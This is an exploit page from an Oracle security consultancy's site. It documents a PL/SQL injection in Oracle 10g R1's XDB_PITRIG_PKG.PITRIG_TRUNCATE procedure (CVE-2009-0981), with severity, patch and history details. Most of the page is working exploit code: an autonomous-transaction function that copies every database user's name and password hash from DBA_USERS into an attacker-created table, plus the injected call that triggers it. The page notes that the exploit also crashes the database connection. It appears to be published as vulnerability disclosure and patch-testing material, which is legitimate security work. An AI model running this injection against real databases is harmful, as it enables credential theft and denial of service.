Services
Oracle Audit / Hardening
Security Training
Consulting
Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts
News & Events
Events
News
Company
Contact
People
Partner
Impressum
Sitemap
Search
Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)
Name
Oracle 10g R1 pitrig_truncate PLSQL Injection (get users hash)
Systems Affected
Oracle 10g R1
Severity
High Risk
Category
Get users hash
Date
06 Jan 2009
Details
This exploit causes the connection to the database to be lost (database crash).
Example
CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));
CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';
COMMIT;
RETURN '';
END;
/
EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)');
select * from sh2kerr;
Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )
History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published
ゥ 2009 by Red-Database-Security GmbH - last update 19-jun-2009
Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.